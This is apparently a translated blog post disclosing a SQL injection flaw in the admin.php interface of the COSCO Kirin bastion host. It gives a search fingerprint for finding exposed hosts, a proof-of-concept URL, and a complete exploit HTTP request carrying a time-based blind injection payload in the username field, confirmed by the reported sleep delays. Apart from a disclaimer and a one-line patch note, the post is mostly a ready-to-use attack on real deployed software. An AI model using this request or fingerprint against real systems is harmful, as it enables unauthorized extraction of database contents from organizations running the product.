SQL injection vulnerability in a certain bastion host

Statement:
This article is only for technical exchanges. Please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself. The author of the article does not bear any responsibility for this. responsibility.

I. Overview

      COSCO Kirin Bastion Host can provide fine-grained access control to maximize the security of user resources. Kirin Bastion has a SQL injection vulnerability.

Vulnerability level high risk
Vulnerability impact COSCO Kirin Fortress aircraft
FLY cert.subject="Baolei"

2. Vulnerability hazards

       There is a sql injection vulnerability in the admin.php interface of COSCO Kirin Fortress. An attacker can use this vulnerability to obtain sensitive database information and drag libraries.

3. Recurrence of vulnerabilities

login interface

POC:

https://ip:port/admin.php?controller=admin_commonuser 

If this echo appears, it indicates that the vulnerability exists. 

EXP:


POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))ptGN) AND '1'='1

 Burp starts! !

sleep5 seconds

 sleep10 seconds

4. Repair suggestions

    The official patch has been released, please upgrade.

Guess you like

Origin blog.csdn.net/qq_56698744/article/details/132711548